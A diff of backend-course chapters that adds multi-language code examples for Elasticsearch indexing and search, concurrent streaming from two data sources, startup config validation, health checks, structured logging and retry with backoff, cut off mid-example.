+    if (row.review && row.sentiment) {
+      yield { review: row.review, sentiment: row.sentiment }
+    }
+  }
+}
+
+const result = await es.helpers.bulk({
+  datasource: generateDocs('reviews.csv'),
+  onDocument: () => ({ index: { _index: INDEX } }),
+})
+
+console.log(`Inserted ${result.successful} documents, ${result.failed} errors`)
+```
+
+```ts title="index.ts / TypeScript 5+ + @elastic/elasticsearch"
+import { Client } from '@elastic/elasticsearch'
+
+// The document type is worth declaring even though Elasticsearch is
+// schemaless-ish: it is the only thing keeping the indexer and the
+// search code agreeing on field names, and a field name typo here is
+// not an error at all in Elasticsearch, it just indexes a new field
+// that nothing will ever search.
+interface Review {
+  review: string
+  sentiment: 'positive' | 'negative'
+}
+
+const es = new Client({
+  cloud: { id: process.env.ELASTIC_CLOUD_ID! },
+  auth: { apiKey: process.env.ELASTIC_API_KEY! },
+})
+
+const INDEX = 'reviews'
+
+// 1. Create index with explicit mapping
+if (await es.indices.exists({ index: INDEX })) {
+  await es.indices.delete({ index: INDEX })
+}
+
+await es.indices.create({
+  index: INDEX,
+  mappings: {
+    properties: {
+      review: { type: 'text' },       // analysed full-text
+      sentiment: { type: 'keyword' }, // exact: "positive" / "negative"
+    },
+  },
+})
+
+// 2. Bulk insert, streamed
+const result = await es.helpers.bulk<Review>({
+  datasource: generateDocs('reviews.csv'),
+  onDocument: () => ({ index: { _index: INDEX } }),
+  onDrop: (doc) => console.error('dropped', doc.document, doc.error),
+})
+
+console.log(`Inserted ${result.successful} documents, ${result.failed} errors`)
+```
+
+```java title="Indexer.java / Java 17+ + Elasticsearch Java API Client"
+public record Review(String review, String sentiment) {}
+
+ElasticsearchClient es = new ElasticsearchClient(
+    new RestClientTransport(
+        RestClient.builder(HttpHost.create("https://...")).build(),
+        new JacksonJsonpMapper()));
+
+final String INDEX = "reviews";
+
+// 1. Create index with explicit mapping.
+// The Java client's builder lambdas mirror the JSON DSL one level per
+// nested object, which is verbose but means a misspelled DSL key is a
+// compile error rather than an index that silently ignores it.
+if (es.indices().exists(e -> e.index(INDEX)).value()) {
+    es.indices().delete(d -> d.index(INDEX));
+}
+
+es.indices().create(c -> c
+    .index(INDEX)
+    .mappings(m -> m
+        .properties("review", p -> p.text(t -> t))        // analysed full-text
+        .properties("sentiment", p -> p.keyword(k -> k))  // exact match
+    ));
+
+// 2. Bulk insert from CSV, in batches rather than one request per row.
+BulkRequest.Builder br = new BulkRequest.Builder();
+
+try (CSVParser rows = CSVFormat.DEFAULT.withFirstRecordAsHeader()
+        .parse(new FileReader("reviews.csv"))) {
+    for (CSVRecord row : rows) {
+        String review = row.get("review");
+        String sentiment = row.get("sentiment");
+        if (review.isBlank() || sentiment.isBlank()) continue;
+
+        br.operations(op -> op.index(idx -> idx
+            .index(INDEX)
+            .document(new Review(review, sentiment))));
+    }
+}
+
+BulkResponse result = es.bulk(br.build());
+long failed = result.items().stream().filter(i -> i.error() != null).count();
+System.out.printf("Inserted %d documents, %d errors%n",
+    result.items().size() - failed, failed);
+```
+
 ### Search with Fuzzy + Field Boost
 
-```python
-Pythondef search_reviews(query: str, sentiment_filter: str = None) -> list:
+Go Python JavaScript TypeScript Java
+
+`must` scores, `filter` does not: the difference is relevance vs a yes/no gate
+
+```go title="search.go / Go + go-elasticsearch"
+// The DSL below is the SAME JSON as in every other tab. What differs is
+// only how the language builds a nested object, so read one tab for the
+// query and the others for the ergonomics.
+func searchReviews(es *elasticsearch.Client, query, sentiment string) ([]Hit, error) {
+    must := []map[string]any{{
+        "multi_match": map[string]any{
+            "query":     strings.ToLower(query),
+            "fields":    []string{"review"},
+            "fuzziness": "AUTO",  // edit distance scaled to term length
+            "operator":  "and",   // all terms must appear
+        },
+    }}
+
+    filter := []map[string]any{}
+    if sentiment != "" {
+        // `filter`, not `must`: a filter is a yes/no gate that does not
+        // affect the score, and Elasticsearch caches it. Putting an exact
+        // term in `must` pollutes the ranking with a constant.
+        filter = append(filter, map[string]any{
+            "term": map[string]any{"sentiment": sentiment},
+        })
+    }
+
+    body, _ := json.Marshal(map[string]any{
+        "query": map[string]any{"bool": map[string]any{"must": must, "filter": filter}},
+        "size":  20,
+    })
+
+    res, err := es.Search(
+        es.Search.WithIndex("reviews"),
+        es.Search.WithBody(bytes.NewReader(body)),
+    )
+    if err != nil {
+        return nil, err
+    }
+    defer res.Body.Close()
+
+    var parsed struct {
+        Hits struct {
+            Hits []struct {
+                Score  float64         `json:"_score"`
+                Source json.RawMessage `json:"_source"`
+            } `json:"hits"`
+        } `json:"hits"`
+    }
+    json.NewDecoder(res.Body).Decode(&parsed)
+
+    // "gret" (typo for "great") matches via fuzziness=AUTO (edit distance 1)
+    return toHits(parsed.Hits.Hits), nil
+}
+```
+
+```python title="search.py / Python + elasticsearch-py"
+def search_reviews(query: str, sentiment_filter: str = None) -> list:
     must_clauses = [{
         "multi_match": {
             "query":     query.lower(),
@@ -424,12 +824,196 @@ results = search_reviews("gret product", sentiment_filter="positive")
 # "gret" (typo for "great") matched via fuzziness=AUTO (edit distance 1)
 ```
 
-### Streaming Results from Two Sources (Node.js Pattern)
+```js title="search.js / Node 20+ + @elastic/elasticsearch"
+async function searchReviews(query, sentimentFilter) {
+  const must = [{
+    multi_match: {
+      query: query.toLowerCase(),
+      fields: ['review'],
+      fuzziness: 'AUTO', // edit distance scaled to term length
+      operator: 'and',   // all terms must appear
+    },
+  }]
 
-The demo in the lecture used a Next.js API route that streams results from Postgres and Elasticsearch simultaneously so neither waits for the other. Here is the pattern in pure Node.js:
+  // `filter`, not `must`. A filter is a yes/no gate: it does not
+  // contribute to the score and Elasticsearch caches the bitset, so it
+  // is both more correct for exact matches and faster.
+  const filter = sentimentFilter
+    ? [{ term: { sentiment: sentimentFilter } }]
+    : []
 
-```text
-Node.js (ESM)import { Client } from '@elastic/elasticsearch'
+  const resp = await es.search({
+    index: INDEX,
+    query: { bool: { must, filter } },
+    size: 20,
+  })
+
+  return resp.hits.hits.map((hit) => ({ score: hit._score, ...hit._source }))
+}
+
+// Usage
+const results = await searchReviews('gret product', 'positive')
+// "gret" (typo for "great") matched via fuzziness=AUTO (edit distance 1)
+```
+
+```ts title="search.ts / TypeScript 5+ + @elastic/elasticsearch"
+import type { QueryDslQueryContainer } from '@elastic/elasticsearch/lib/api/types'
+
+// The client's own DSL types are the reason to use TypeScript here: the
+// query DSL is a deeply nested untyped blob in every other language, and
+// a misspelled key like `fuzzines` is not an error to Elasticsearch, it
+// is a silently ignored clause that quietly turns typo tolerance off.
+async function searchReviews(
+  query: string,
+  sentimentFilter?: 'positive' | 'negative',
+): Promise<Array<Review & { score: number }>> {
+  const must: QueryDslQueryContainer[] = [{
+    multi_match: {
+      query: query.toLowerCase(),
+      fields: ['review'],
+      fuzziness: 'AUTO', // edit distance scaled to term length
+      operator: 'and',   // all terms must appear
+    },
+  }]
+
+  const filter: QueryDslQueryContainer[] = sentimentFilter
+    ? [{ term: { sentiment: sentimentFilter } }] // exact gate, unscored
+    : []
+
+  const resp = await es.search<Review>({
+    index: INDEX,
+    query: { bool: { must, filter } },
+    size: 20,
+  })
+
+  return resp.hits.hits.map((hit) => ({
+    score: hit._score ?? 0, // _score is null on a pure filter query
+    ...(hit._source as Review),
+  }))
+}
+```
+
+```java title="SearchService.java / Java 17+ + Elasticsearch Java API Client"
+List<Hit<Review>> searchReviews(String query, String sentimentFilter) throws IOException {
+    Query multiMatch = MultiMatchQuery.of(m -> m
+        .query(query.toLowerCase())
+        .fields("review")
+        .fuzziness("AUTO")                 // edit distance scaled to term length
+        .operator(Operator.And)            // all terms must appear
+    )._toQuery();
+
+    // `filter`, not `must`: an exact term is a yes/no gate that should
+    // not influence the score, and Elasticsearch caches it.
+    List<Query> filters = (sentimentFilter == null) ? List.of() : List.of(
+        TermQuery.of(t -> t.field("sentiment").value(sentimentFilter))._toQuery());
+
+    SearchResponse<Review> resp = es.search(s -> s
+        .index("reviews")
+        .size(20)
+        .query(q -> q.bool(b -> b.must(multiMatch).filter(filters))),
+        Review.class);
+
+    // "gret" (typo for "great") matches via fuzziness=AUTO (edit distance 1)
+    return resp.hits().hits();
+}
+```
+
+### Streaming Results from Two Sources
+
+The demo in the lecture used a Next.js API route that streams results from Postgres and Elasticsearch simultaneously so neither waits for the other. The shape is the same everywhere: **start both queries before awaiting either**, then send each result the moment it lands rather than holding the fast one hostage to the slow one.
+
+Go Python JavaScript TypeScript Java
+
+fire both queries concurrently, stream each result as it arrives
+
+```go title="stream.go / Go"
+// Go's version of "don't await sequentially" is a goroutine per source
+// writing into one channel, and a flush after every write so the bytes
+// actually leave the process instead of sitting in the buffer.
+func streamSearch(w http.ResponseWriter, r *http.Request) {
+    term := r.URL.Query().Get("q")
+
+    w.Header().Set("Content-Type", "text/event-stream")
+    flusher, ok := w.(http.Flusher)
+    if !ok {
+        http.Error(w, "streaming unsupported", http.StatusInternalServerError)
+        return
+    }
+
+    type result struct {
+        Source string `json:"source"`
+        Data   any    `json:"data"`
+        Err    string `json:"error,omitempty"`
+    }
+
+    ch := make(chan result, 2)
+    var wg sync.WaitGroup
+    wg.Add(2)
+
+    // Fire BOTH queries concurrently, don't await sequentially
+    go func() {
+        defer wg.Done()
+        rows, err := pgSearch(r.Context(), term)
+        ch <- result{Source: "postgres", Data: rows, Err: errString(err)}
+    }()
+
+    go func() {
+        defer wg.Done()
+        hits, err := esSearch(r.Context(), term)
+        ch <- result{Source: "elasticsearch", Data: hits, Err: errString(err)}
+    }()
+
+    go func() { wg.Wait(); close(ch) }()
+
+    enc := json.NewEncoder(w)
+    for res := range ch { // whichever finishes first is sent first
+        enc.Encode(res)
+        flusher.Flush()
+    }
+}
+```
+
+```python title="stream.py / Python + FastAPI"
+import asyncio
+import json
+
+from fastapi import Request
+from fastapi.responses import StreamingResponse
+
+
+@app.get("/search/stream")
+async def stream_search(request: Request):
+    term = request.query_params.get("q", "")
+
+    async def generate():
+        # Fire BOTH queries concurrently, don't await sequentially.
+        # create_task starts the coroutine now; awaiting them in turn
+        # would run the second only after the first had finished.
+        pending = {
+            asyncio.create_task(pg_search(term)): "postgres",
+            asyncio.create_task(es_search(term)): "elasticsearch",
+        }
+
+        while pending:
+            # Wake on whichever task finishes FIRST, so the fast source
+            # is never held hostage by the slow one.
+            done, _ = await asyncio.wait(
+                pending, return_when=asyncio.FIRST_COMPLETED)
+
+            for task in done:
+                source = pending.pop(task)
+                try:
+                    yield json.dumps({"source": source, "data": task.result()}) + "\n"
+                except Exception as e:
+                    # One source failing degrades the page, it does not
+                    # blank it: the other source's results still ship.
+                    yield json.dumps({"source": source, "error": str(e)}) + "\n"
+
+    return StreamingResponse(generate(), media_type="text/event-stream")
+```
+
+```js title="stream.js / Node 20+ (ESM)"
+import { Client } from '@elastic/elasticsearch'
 import { neon }     from '@neondatabase/serverless'
 
 export async function GET(req) {
@@ -457,6 +1041,92 @@ export async function GET(req) {
     }
   })
   return new Response(stream, { headers: { 'Content-Type': 'text/event-stream' } })
+}
+```
+
+```ts title="stream.ts / TypeScript 5+"
+interface StreamChunk<T> {
+  source: 'postgres' | 'elasticsearch'
+  status: 'fulfilled' | 'rejected'
+  data?: T
+  error?: string
+}
+
+// allSettled, never all: `Promise.all` rejects the whole response the
+// moment ONE source fails, which is precisely the wrong behaviour here.
+// Elasticsearch being down should degrade the page to Postgres results,
+// not blank it. The union type above is what forces the consumer to
+// handle the rejected case rather than assuming `data` is there.
+export async function GET(req: Request): Promise<Response> {
+  const term = new URL(req.url).searchParams.get('q') ?? ''
+  const encoder = new TextEncoder()
+
+  const stream = new ReadableStream({
+    async start(controller) {
+      const send = <T>(chunk: StreamChunk<T>): void => {
+        controller.enqueue(encoder.encode(JSON.stringify(chunk) + '\n'))
+      }
+
+      // Fire BOTH queries concurrently, and send each as it settles
+      await Promise.all([
+        pgSearch(term).then(
+          (data) => send({ source: 'postgres', status: 'fulfilled', data }),
+          (err: Error) => send({ source: 'postgres', status: 'rejected', error: err.message }),
+        ),
+        esSearch(term).then(
+          (data) => send({ source: 'elasticsearch', status: 'fulfilled', data }),
+          (err: Error) => send({ source: 'elasticsearch', status: 'rejected', error: err.message }),
+        ),
+      ])
+
+      controller.close()
+    },
+  })
+
+  return new Response(stream, { headers: { 'Content-Type': 'text/event-stream' } })
+}
+```
+
+```java title="StreamController.java / Java 17+ + Spring Boot"
+@RestController
+class StreamController {
+
+    // SseEmitter is Spring's streaming response: the request thread is
+    // released immediately and events are pushed as they are produced.
+    @GetMapping(value = "/search/stream", produces = MediaType.TEXT_EVENT_STREAM_VALUE)
+    SseEmitter streamSearch(@RequestParam(defaultValue = "") String q) {
+        SseEmitter emitter = new SseEmitter(30_000L); // always set a timeout
+
+        // Fire BOTH queries concurrently, don't await sequentially.
+        // supplyAsync starts the work now; the thenAccept fires per source.
+        CompletableFuture<Void> pg = CompletableFuture
+            .supplyAsync(() -> pgSearch(q))
+            .handle((data, err) -> send(emitter, "postgres", data, err))
+            .thenAccept(x -> { });
+
+        CompletableFuture<Void> es = CompletableFuture
+            .supplyAsync(() -> esSearch(q))
+            .handle((data, err) -> send(emitter, "elasticsearch", data, err))
+            .thenAccept(x -> { });
+
+        // Complete only once BOTH have reported, success or failure.
+        CompletableFuture.allOf(pg, es)
+            .whenComplete((v, err) -> emitter.complete());
+
+        return emitter;
+    }
+
+    private Object send(SseEmitter emitter, String source, Object data, Throwable err) {
+        try {
+            emitter.send(Map.of(
+                "source", source,
+                err == null ? "data" : "error",
+                err == null ? data : err.getMessage()));
+        } catch (IOException io) {
+            emitter.completeWithError(io); // client hung up mid-stream
+        }
+        return null;
+    }
 }
 ```
 
@@ -518,4 +1188,4 @@ As the lecturer noted: _"You don't have to master Elasticsearch the way you must
 
 Backend Field Manual / Full-Text Search Chapter / Notes compiled from video lecture
 
-Backend from First Principles / Chapter 11 / Search. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 11 / Search. Code targets Postgres 14+, Elasticsearch 8+, Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/12-error-handling-and-fault-tolerance.mdx
+++ b/src/content/chapters/12-error-handling-and-fault-tolerance.mdx
@@ -2,7 +2,7 @@
 order: 12
 title: "Error Handling & Fault-Tolerant Systems"
 navTitle: "Error Handling & Fault Tolerance"
-summary: "Chapter 12 of Backend from First Principles: Error Handling & Fault Tolerance."
+summary: "Every backend fails; the difference is whether it fails loudly and recoverably or silently and expensively. The five classes of error, failing fast at startup, deep health checks, retries with backoff and jitter, one global handler at the edge, and what a client must never be told. Worked implementations in Go, Python, JavaScript, TypeScript and Java."
 readingTime: "2-3 hours"
 keywords:
   - "error"
@@ -223,10 +223,14 @@ The golden rule: **validate all required environment variables before the server
 Blue-green deployments make startup-time crashes safe: the new version must pass health checks before the old version is terminated. If the new version crashes at start, the old version keeps serving traffic.
 </Callout>
 
-### Go: Config Validation at Boot
+### Config Validation at Boot
 
-```go
-Gopackage config
+Go Python JavaScript TypeScript Java
+
+check every required variable before the port is bound
+
+```go title="config.go / Go"
+package config
 
 import (
     "fmt"
@@ -279,6 +283,141 @@ func main() {
 }
 ```
 
+```python title="config.py / Python"
+import os
+import sys
+from dataclasses import dataclass
+
+REQUIRED = [
+    "DATABASE_URL",
+    "OPENAI_API_KEY",
+    "JWT_SECRET",
+    "RESEND_API_KEY",
+]
+
+
+@dataclass(frozen=True)
+class Config:
+    database_url: str
+    openai_key: str
+    jwt_secret: str
+    resend_api_key: str
+
+
+def must_load() -> Config:
+    """Exit if any required variable is missing.
+
+    Call this once at startup, before the server binds a port.
+    """
+    missing = [key for key in REQUIRED if not os.getenv(key)]
+    if missing:
+        # Crash immediately, loud and clear
+        sys.exit(f"[FATAL] missing required env vars: {', '.join(missing)}")
+
+    return Config(
+        database_url=os.environ["DATABASE_URL"],
+        openai_key=os.environ["OPENAI_API_KEY"],
+        jwt_secret=os.environ["JWT_SECRET"],
+        resend_api_key=os.environ["RESEND_API_KEY"],
+    )
+
+
+# main.py
+config = must_load()  # exits here if config invalid
+```
+
+```js title="config.js / Node 20+"
+const REQUIRED = [
+  'DATABASE_URL',
+  'OPENAI_API_KEY',
+  'JWT_SECRET',
+  'RESEND_API_KEY',
+]
+
+// Exits if any required variable is missing.
+// Call this once at startup, before app.listen().
+export function mustLoad() {
+  const missing = REQUIRED.filter((key) => !process.env[key])
+
+  if (missing.length > 0) {
+    // Crash immediately, loud and clear
+    console.error(`[FATAL] missing required env vars: ${missing.join(', ')}`)
+    process.exit(1)
+  }
+
+  return {
+    databaseUrl: process.env.DATABASE_URL,
+    openaiKey: process.env.OPENAI_API_KEY,
+    jwtSecret: process.env.JWT_SECRET,
+    resendApiKey: process.env.RESEND_API_KEY,
+  }
+}
+
+// server.js
+const config = mustLoad() // exits here if config invalid
+app.listen(8080)
+```
+
+```ts title="config.ts / TypeScript 5+"
+const REQUIRED = ['DATABASE_URL', 'OPENAI_API_KEY', 'JWT_SECRET', 'RESEND_API_KEY'] as const
+
+type RequiredVar = (typeof REQUIRED)[number]
+
+// The return type is the real payoff: every field is `string`, never
+// `string | undefined`. Because this function has already proved the
+// variable is present, nothing downstream needs a second null check,
+// and `process.env.X!` never has to appear anywhere else in the codebase.
+export type Config = Record<RequiredVar, string>
+
+export function mustLoad(): Config {
+  const missing = REQUIRED.filter((key) => !process.env[key])
+
+  if (missing.length > 0) {
+    console.error(`[FATAL] missing required env vars: ${missing.join(', ')}`)
+    process.exit(1) // crash immediately, loud and clear
+  }
+
+  return Object.fromEntries(
+    REQUIRED.map((key) => [key, process.env[key] as string]),
+  ) as Config
+}
+
+export const config = mustLoad() // exits at import if config invalid
+```
+
+```java title="Config.java / Java 17+ + Spring Boot"
+@Component
+public class Config {
+    private static final List<String> REQUIRED = List.of(
+        "DATABASE_URL",
+        "OPENAI_API_KEY",
+        "JWT_SECRET",
+        "RESEND_API_KEY");
+
+    // @PostConstruct runs while the context is starting, so a missing
+    // variable fails the application BEFORE the port is ever bound. That
+    // is the whole point of failing fast: an app that refused to start is
+    // obvious, an app that started half-configured is not.
+    @PostConstruct
+    void validate() {
+        List<String> missing = REQUIRED.stream()
+            .filter(key -> System.getenv(key) == null || System.getenv(key).isBlank())
+            .toList();
+
+        if (!missing.isEmpty()) {
+            // Crash immediately, loud and clear
+            throw new IllegalStateException(
+                "[FATAL] missing required env vars: " + String.join(", ", missing));
+        }
+    }
+}
+
+// Spring's own spelling of the same guarantee is a placeholder with no
+// default, which fails startup and names the property:
+//   app.database-url: ${DATABASE_URL}
+// See chapter 14 for the fuller version with per-field validation.
+```
+
 08
 
 ## Proactive Error Detection: Health Checks
@@ -298,10 +437,14 @@ Health checks continuously verify that your system is working, not just that it 
 - **Configuration**: verify all required env vars are loaded and non-empty at startup.
 - **Cache warmup**: ensure critical caches (session store, product catalogue) are populated before serving traffic.
 
-### Go: Deep Health Check Endpoint
+### Deep Health Check Endpoint
 
-```go
-Gotype HealthStatus struct {
+Go Python JavaScript TypeScript Java
+
+ping every dependency, report per-check status, answer 503 when degraded
+
+```go title="health.go / Go"
+type HealthStatus struct {
     Status   string            `json:"status"`
     Checks   map[string]string `json:"checks"`
 }
@@ -339,6 +482,140 @@ func healthHandler(db *pgxpool.Pool, rdb *redis.Client) http.HandlerFunc {
 }
 ```
 
+```python title="health.py / Python + FastAPI"
+import asyncio
+
+from fastapi import Response
+from sqlalchemy import text
+
+
+@app.get("/ready")
+async def health(response: Response):
+    checks: dict[str, str] = {}
+    overall = "ok"
+
+    # DB check, with its own timeout
+    try:
+        await asyncio.wait_for(db.execute(text("SELECT 1")), timeout=2.0)
+        checks["database"] = "ok"
+    except Exception as e:
+        checks["database"] = f"unhealthy: {e}"
+        overall = "degraded"
+
+    # Redis check
+    try:
+        await redis.ping()
+        checks["cache"] = "ok"
+    except Exception as e:
+        checks["cache"] = f"unhealthy: {e}"
+        overall = "degraded"
+
+    response.status_code = 200 if overall == "ok" else 503
+    return {"status": overall, "checks": checks}
+```
+
+```js title="health.js / Node 20+ + Express"
+app.get('/ready', async (req, res) => {
+  const checks = {}
+  let overall = 'ok'
+
+  // DB check, with its OWN timeout. A health check that can hang is
+  // worse than no health check: the orchestrator's probe times out, the
+  // pod is killed, and nothing in the logs explains why.
+  try {
+    await withTimeout(pool.query('SELECT 1'), 2000)
+    checks.database = 'ok'
+  } catch (err) {
+    checks.database = `unhealthy: ${err.message}`
+    overall = 'degraded'
+  }
+
+  // Redis check
+  try {
+    await redis.ping()
+    checks.cache = 'ok'
+  } catch (err) {
+    checks.cache = `unhealthy: ${err.message}`
+    overall = 'degraded'
+  }
+
+  res.status(overall === 'ok' ? 200 : 503).json({ status: overall, checks })
+})
+```
+
+```ts title="health.ts / TypeScript 5+ + Express"
+import type { Request, Response } from 'express'
+
+interface HealthStatus {
+  status: 'ok' | 'degraded'
+  checks: Record<string, string>
+}
+
+// Describing a check as DATA rather than as another try/catch block is
+// what keeps this endpoint honest as dependencies are added: one entry
+// per dependency, all of them run concurrently, and nobody can add a
+// fifth check that forgets its timeout.
+const CHECKS: Array<{ name: string; probe: () => Promise<unknown> }> = [
+  { name: 'database', probe: () => pool.query('SELECT 1') },
+  { name: 'cache', probe: () => redis.ping() },
+]
+
+export async function health(_req: Request, res: Response): Promise<void> {
+  const results = await Promise.all(
+    CHECKS.map(async ({ name, probe }) => {
+      try {
+        await withTimeout(probe(), 2000)
+        return [name, 'ok'] as const
+      } catch (err) {
+        return [name, `unhealthy: ${(err as Error).message}`] as const
+      }
+    }),
+  )
+
+  const checks = Object.fromEntries(results)
+  const overall: HealthStatus['status'] =
+    results.every(([, v]) => v === 'ok') ? 'ok' : 'degraded'
+
+  res.status(overall === 'ok' ? 200 : 503).json({ status: overall, checks })
+}
+```
+
+```java title="CacheHealthIndicator.java / Java 17+ + Spring Boot Actuator"
+// Spring Boot Actuator already exposes /actuator/health, and it already
+// aggregates a DataSource and a Redis check with no code at all:
+//   management.endpoint.health.show-details: always
+//   management.endpoint.health.probes.enabled: true
+
+// Anything it does not know about is one bean each.
+@Component
+public class CacheHealthIndicator implements HealthIndicator {
+    private final StringRedisTemplate redis;
+
+    CacheHealthIndicator(StringRedisTemplate redis) {
+        this.redis = redis;
+    }
+
+    @Override
+    public Health health() {
+        try {
+            redis.getConnectionFactory().getConnection().ping();
+            return Health.up().build();
+        } catch (Exception e) {
+            // One DOWN makes the aggregate DOWN, and /actuator/health then
+            // answers 503, which is what the orchestrator actually watches.
+            return Health.down(e).withDetail("cache", "unhealthy").build();
+        }
+    }
+}
+
+// Liveness and readiness are separate GROUPS, and conflating them is the
+// classic mistake: a database outage should fail readiness (stop routing
+// traffic here) but NOT liveness, because restarting the pod will not
+// bring the database back, it will only add a crash loop to the incident.
+//   management.endpoint.health.group.readiness.include: db,cache
+//   management.endpoint.health.group.liveness.include: ping
+```
+
 09
 
 ## Monitoring & Observability
@@ -363,8 +640,31 @@ Health checks tell you something is broken _right now_. Monitoring tells you som
 
 Plain-text logs are hard to query at scale. Use structured JSON logs so log aggregation tools (Grafana Loki, Datadog, ELK) can parse, filter, and alert on them programmatically.
 
-```text
-Python / structlogimport structlog
+Go Python JavaScript TypeScript Java
+
+one queryable object per event, never an interpolated sentence
+
+```go title="logging.go / Go + log/slog"
+// Go's standard library has had structured logging since 1.21: log/slog.
+logger := slog.New(slog.NewJSONHandler(os.Stdout, nil))
+
+// Good, structured, queryable, no sensitive data
+logger.Error("payment_failed",
+    "user_id", userID,
+    "order_id", orderID,
+    "amount_cents", 4999,
+    "provider", "stripe",
+    "error_code", "card_declined",
+    "correlation_id", correlationID,
+)
+
+// Bad: one opaque sentence. No aggregator can filter on "all declined
+// cards for this provider", because there are no fields to filter on.
+logger.Error(fmt.Sprintf("payment failed for %s on order %s", userID, orderID))
+```
+
+```python title="logging.py / Python + structlog"
+import structlog
 
 log = structlog.get_logger()
 
@@ -380,6 +680,79 @@ log.error(
 
 # BAD, never log PII or secrets
 # log.error("payment_failed", email="alice@example.com", card="4242...")
+```
+
+```js title="logging.js / Node 20+ + pino"
+import pino from 'pino'
+
+const log = pino({
+  // Redaction belongs HERE, not at the call sites. One list, applied to
+  // every log line, is the only version of this that survives contact
+  // with a growing codebase.
+  redact: ['*.password', '*.card', 'req.headers.authorization'],
+})
+
+// Good, structured, queryable, no sensitive data.
+// pino's convention: the object first, the message second.
+log.error({
+  user_id: 'u_9a3f',            // ID, not email
+  correlation_id: 'req_abc123',
+  provider: 'stripe',
+  error_code: 'card_declined',
+  amount_cents: 4999,
+}, 'payment_failed')
+
+// BAD, never log PII or secrets
+// log.error({ email: 'alice@example.com', card: '4242...' }, 'payment_failed')
+```
+
+```ts title="logging.ts / TypeScript 5+ + pino"
+import pino from 'pino'
+
+// Naming the event shape is worth it for exactly one reason: the field
+// names become a contract. A dashboard querying `error_code` keeps
+// working because a rename now breaks the build rather than silently
+// emitting a field nothing is watching.
+interface PaymentFailed {
+  user_id: string
+  correlation_id: string
+  provider: 'stripe' | 'adyen'
+  error_code: string
+  amount_cents: number
+}
+
+const log = pino({ redact: ['*.password', '*.card', 'req.headers.authorization'] })
+
+export function logPaymentFailed(event: PaymentFailed): void {
+  log.error(event, 'payment_failed')
+}
+
+// And because `email` is not a field of PaymentFailed, the PII mistake
+// below does not compile:
+//   logPaymentFailed({ ...event, email: user.email })
+```
+
+```java title="Logging.java / Java 17+ + SLF4J + Logstash encoder"
+private static final Logger log = LoggerFactory.getLogger(PaymentService.class);
+
+// SLF4J's message is a template, not a formatted string. The two look
+// alike and are not: the placeholders are only filled in if the level is
+// enabled, and structured appenders can keep the arguments separate.
+log.atError()
+   .setMessage("payment_failed")
+   .addKeyValue("user_id", "u_9a3f")            // ID, not email
+   .addKeyValue("correlation_id", "req_abc123")
+   .addKeyValue("provider", "stripe")
+   .addKeyValue("error_code", "card_declined")
+   .addKeyValue("amount_cents", 4999)
+   .log();
+
+// With net.logstash.logback.encoder.LogstashEncoder, every addKeyValue
+// becomes a top-level JSON field that Loki or ELK can filter on.
+
+// BAD, an interpolated sentence: no fields, nothing to query, and the
+// string is built even when ERROR is disabled.
+// log.error("payment failed for " + user.getEmail() + " on " + orderId);
 ```
 
 10
@@ -404,10 +777,14 @@ log.error(
 
 **Strategy:** Graceful degradation. Fallback. Disable the feature. Protect core functionality.
 
-### Exponential Backoff in Go
+### Exponential Backoff
 
-```go
-Gofunc sendEmailWithRetry(to, subject, body string) error {
+Go Python JavaScript TypeScript Java
+
+double the wait each attempt, add jitter, and never retry a permanent failure
+
+```go title="retry.go / Go"
+func sendEmailWithRetry(to, subject, body string) error {
     maxRetries := 5
     baseDelay  := 1 * time.Second
 
@@ -445,6 +822,159 @@ func isRetryable(err error) bool {
 }
 ```
 
+```python title="retry.py / Python"
+import random
+import time
+
+
+def send_email_with_retry(to: str, subject: str, body: str) -> None:
+    max_retries = 5
+    base_delay = 1.0  # seconds
+
+    for attempt in range(max_retries):
+        try:
+            email_client.send(to, subject, body)
+            return  # success
+        except Exception as err:
+            if not is_retryable(err):
+                raise RuntimeError("permanent failure") from err
+
+            # Exponential backoff: 1s, 2s, 4s, 8s, 16s
+            wait = base_delay * (2 ** attempt)
+            # Add jitter (+/-20%) to prevent thundering herd
+            jitter = random.uniform(0, wait / 5)
+            time.sleep(wait + jitter)
+
+            log.warning(
+                "email_send_failed_retrying",
+                attempt=attempt + 1,
+                wait_ms=int(wait * 1000),
+                error=str(err),
+            )
+
+    raise RuntimeError(f"all {max_retries} retries exhausted")
+
+
+def is_retryable(err: Exception) -> bool:
+    # Retry on 429, 503, network errors; not on 400, 401, 422
+    if isinstance(err, HTTPError):
+        return err.status_code == 429 or err.status_code >= 500
+    return True  # network errors are always retryable
+```
+
+```js title="retry.js / Node 20+"
+const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms))
+
+export async function sendEmailWithRetry(to, subject, body) {
+  const maxRetries = 5
+  const baseDelay = 1000 // ms
+
+  for (let attempt = 0; attempt < maxRetries; attempt++) {
+    try {
+      await emailClient.send(to, subject, body)
+      return // success
+    } catch (err) {
+      if (!isRetryable(err)) {
+        throw new Error('permanent failure', { cause: err })
+      }
+
+      // Exponential backoff: 1s, 2s, 4s, 8s, 16s
+      const wait = baseDelay * 2 ** attempt
+      // Add jitter (+/-20%) to prevent thundering herd
+      const jitter = Math.random() * (wait / 5)
+      await sleep(wait + jitter)
+
+      log.warn({ attempt: attempt + 1, wait_ms: wait, err },
+        'email send failed, retrying')
+    }
+  }
+  throw new Error(`all ${maxRetries} retries exhausted`)
+}
+
+function isRetryable(err) {
+  // Retry on 429, 503, network errors; not on 400, 401, 422
+  if (err.statusCode) return err.statusCode === 429 || err.statusCode >= 500
+  return true // network errors are always retryable
+}
+```
+
+```ts title="retry.ts / TypeScript 5+"
+// Generic, because "retry with backoff" is never needed exactly once.
+// The type parameter keeps the wrapped call's return value intact, so
+// adding retries to a call site changes nothing about how it is used.
+export async function withRetry<T>(
+  work: () => Promise<T>,
+  opts: { maxRetries?: number; baseDelayMs?: number; signal?: AbortSignal } = {},
+): Promise<T> {
+  const { maxRetries = 5, baseDelayMs = 1000, signal } = opts
+
+  for (let attempt = 0; attempt < maxRetries; attempt++) {
+    // The AbortSignal matters more than it looks. Without it, a client
+    // that hung up three seconds ago still costs you thirty-one seconds
+    // of retries against an API you are paying per call for.
+    signal?.throwIfAborted()
+
+    try {
+      return await work()
+    } catch (err) {
+      if (!isRetryable(err)) {
+        throw new Error('permanent failure', { cause: err })
+      }
+
+      const wait = baseDelayMs * 2 ** attempt   // 1s, 2s, 4s, 8s, 16s
+      const jitter = Math.random() * (wait / 5) // +/-20%, no thundering herd
+      await sleep(wait + jitter, signal)
+
